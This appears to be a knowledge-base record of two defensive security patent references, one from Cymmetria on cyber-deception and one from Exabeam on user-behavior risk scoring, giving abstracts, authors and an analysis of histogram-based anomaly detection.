  • "A computer implemented method of detecting unauthorized access to a protected network from external endpoints, comprising monitoring, at a protected network, communication with one or more external endpoints using one or more access clients to access one or more of a plurality of resources of the protected networked, where one or more deception resources created in the protected network map one or more of the plurality of resources, detecting usage of data contained in one or more of a plurality of deception data objects deployed in the one or more access clients by monitoring an interaction triggered by one or more of the deception data objects with the one or more deception resources when used and identifying one or more potential unauthorized operations based on analysis of the detection."

kb-author

  • "Gadi EVRON; Dean SYSMAN; Imri Goldberg; Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria, Inc."

rdfs:label

  • "Reference - Supply chain cyber-deception - Cymmetria, Inc."

kb-reference-of

kb-reference-title

  • "Supply chain cyber-deception"

Usage (5)

kb-abstract

  • "The present disclosure is directed to a system, method, and computer program for detecting and assessing security risks in an enterprise's computer network. A behavior model is built for a user in the network based on the user's interactions with the network, wherein a behavior model for a user indicates client device(s), server(s), and resources used by the user. The user's behavior during a period of time is compared to the user's behavior model. A risk assessment is calculated for the period of time based at least in part on the comparison between the user's behavior and the user's behavior model, wherein any one of certain anomalies between the user's behavior and the user's behavior model increase the risk assessment."

kb-author

  • "Sylvain Gil; Domingo Mihovilovic; Nir Polak; Magnus Stensmo; Sing Yip"

kb-mitre-analysis

  • "This patent describes calculating a risk score to detect anomalies in user activity based on comparing a user's current session with a user behavior model. The user behavior model is comprised of a number of histograms including:

    * client devices from which the user logs in
    * servers accessed
    * data accessed
    * applications accessed
    * session duration
    * logon time of day
    * logon day of week
    * geo - location of logon origination

    The system has an initial training period with x number of days (e. g., 90 days) in which session data is recorded in behavior models before behavior analysis begins.The histograms are then used to determine anomalies between current session activity and a user's behavior model. Values for a histogram category are along one axis and the number of times the value is received for the category is along another axis. If a data point value associated with the current user session is over an anomaly threshold, an alert is generated."

kb-organization

  • "Exabeam Inc"

rdfs:label

  • "Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc"

kb-reference-of

kb-reference-title

  • "System, method, and computer program product for detecting and assessing security risks in a network"

Usage (5)